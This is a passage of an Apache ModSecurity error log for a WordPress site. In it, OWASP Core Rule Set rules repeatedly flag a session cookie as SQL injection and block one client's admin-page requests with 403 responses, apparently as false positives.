"agI7S3o_DFxNSZVmaX3PrQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:47.841175 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7S3o_DFxNSZVmaX3PrQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:48.402466 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7S3o_DFxNSZVmaX3PrQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:48.821460 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7THo_DFxNSZVmaX3PrgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:48.821746 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7THo_DFxNSZVmaX3PrgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:49.405999 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7THo_DFxNSZVmaX3PrgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:49.854971 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7TXo_DFxNSZVmaX3PrwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:49.855279 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7TXo_DFxNSZVmaX3PrwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:50.222408 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7TXo_DFxNSZVmaX3PrwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:50.836406 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7Tno_DFxNSZVmaX3PsQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:50.836669 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7Tno_DFxNSZVmaX3PsQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:51.454419 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7Tno_DFxNSZVmaX3PsQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:51.836500 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7T3o_DFxNSZVmaX3PsgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:51.836778 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7T3o_DFxNSZVmaX3PsgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:52.452235 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7T3o_DFxNSZVmaX3PsgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:52.946287 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7UHo_DFxNSZVmaX3PswAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:52.946567 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7UHo_DFxNSZVmaX3PswAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:54.167274 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7UHo_DFxNSZVmaX3PswAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:54.425544 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7Uno_DFxNSZVmaX3PtQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:54.425829 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7Uno_DFxNSZVmaX3PtQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:54.975947 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7Uno_DFxNSZVmaX3PtQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:55.253224 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7U3o_DFxNSZVmaX3PtwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:55.253508 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7U3o_DFxNSZVmaX3PtwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:55.803371 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7U3o_DFxNSZVmaX3PtwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:56.321235 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7VHo_DFxNSZVmaX3PuwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:56.321510 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7VHo_DFxNSZVmaX3PuwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:56.686959 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7VHo_DFxNSZVmaX3PuwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:57.344539 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7VXo_DFxNSZVmaX3PwQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:57.344840 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7VXo_DFxNSZVmaX3PwQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:57.942955 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7VXo_DFxNSZVmaX3PwQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:58.338729 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7Vno_DFxNSZVmaX3PwwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:58.338999 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7Vno_DFxNSZVmaX3PwwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:58.956680 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7Vno_DFxNSZVmaX3PwwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:59.346887 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7V3o_DFxNSZVmaX3PxgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:59.347239 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7V3o_DFxNSZVmaX3PxgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:59.936799 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7V3o_DFxNSZVmaX3PxgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:00.430816 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7WHo_DFxNSZVmaX3PyAAAANA"], referer: https://rentparadise.fr/wp-login.php
